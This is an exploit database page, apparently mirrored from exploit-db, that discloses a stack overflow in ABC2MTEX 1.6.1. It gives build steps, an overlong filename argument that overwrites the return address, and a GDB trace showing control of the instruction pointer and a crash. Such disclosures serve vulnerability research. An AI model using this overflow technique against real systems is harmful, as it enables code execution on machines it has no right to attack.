pwnwiki.com
,
EXP
Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann <email protected> Vendor Homepage: https://abcnotation.com/abc2mtex/ Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz Version: 1.6.1 Tested on: Debian Buster An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return address from the openIn function by providing a long input filename. This carries similar risk to CVE-2004-1257. Setup: $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz $ tar -xzf abc2mtex1.6.1.tar.gz $ make $ gcc --version gcc (Debian 8.3.0-6) 8.3.0 Copyright (C) 2018 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. PoC: $ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA GDB: We're going to place a breakpoint before and after abc.c:241 to show the overflow. $ gdb -q ./abc2mtex Reading symbols from ./abc2mtex...done. (gdb) break abc.c:241 Breakpoint 1 at 0x4139: file abc.c, line 241. (gdb) break abc.c:242 Breakpoint 2 at 0x414c: file abc.c, line 242. (gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241 241 (void) strcpy(savename,filename); (gdb) bt #0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241 #1 0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273 (gdb) c Continuing. Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242 242 (void) strcat(filename,".abc"); (gdb) bt #0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242 #1 0x0000414243444546 in ?? () #2 0x00007fffffffe4f8 in ?? () #3 0x0000000200000000 in ?? () #4 0x0000000000000000 in ?? () (gdb) c Continuing. file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist Program received signal SIGSEGV, Segmentation fault. 0x0000414243444546 in ?? () (gdb) quit
免费、自由、人人可编辑的漏洞库--PwnWiki.com